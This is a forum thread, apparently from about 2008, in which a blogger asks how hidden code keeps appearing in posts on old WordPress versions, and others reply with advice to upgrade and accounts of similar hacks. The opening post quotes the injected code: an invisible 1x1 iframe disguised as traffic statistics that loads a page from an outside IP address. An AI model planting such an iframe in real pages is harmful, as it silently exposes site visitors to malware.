Hope this is the right section to post. In two of my blogs created with WordPress I found a malware. This is the code I found in a post: <!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://61.155.8.157/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics --> Code (markup): The version of WP is 2.3.3 and 2.1.2. Do you know how is it possibile to put this malware code in my posts? The blogs haven't users. It's the 3° or 4° time I found this code!
Follow the upgrade instructions delete away the files and install WP 2.5. I guess they might have been hacked into.
I had this same hack happen when I was on 2.3.2. It seems to be the same group. Ive since upgraded but I noticed one other blogger and around the net some using 2.5 have been hit by this same chinese guy. I saw the new code and its very similiar to when i was hacked and my antivirus software went off thats how I knew it was on his blog. I dont know if 2.5 has fixed the problem or not, but I haven't been hit so far.
First of all do some things : your password must be from letters and numbers because is harder for them to hack your site.And second if you zipped the wordpress folder and extract it later , delete the zipp.SQL Injection is very efficient when it comes to wordpress.Wordpress still has many bugs.
Poor woman in Maine has her blog being used as a hacking base for thousands of other blogs....they inserted some 200 links to her blog on thousands of blogs under a hidden span tag. Google is going to ban her and she seems completely innocent. Trying to drop her a note right now, her blog is 2.3 and has been hacked....
yeah you gotta keep to date, their is bots that are going around searching for older wordpresse versions. One of my sites got hit twice over a few months and different releases, so they keep lists or the bots are refinding the site.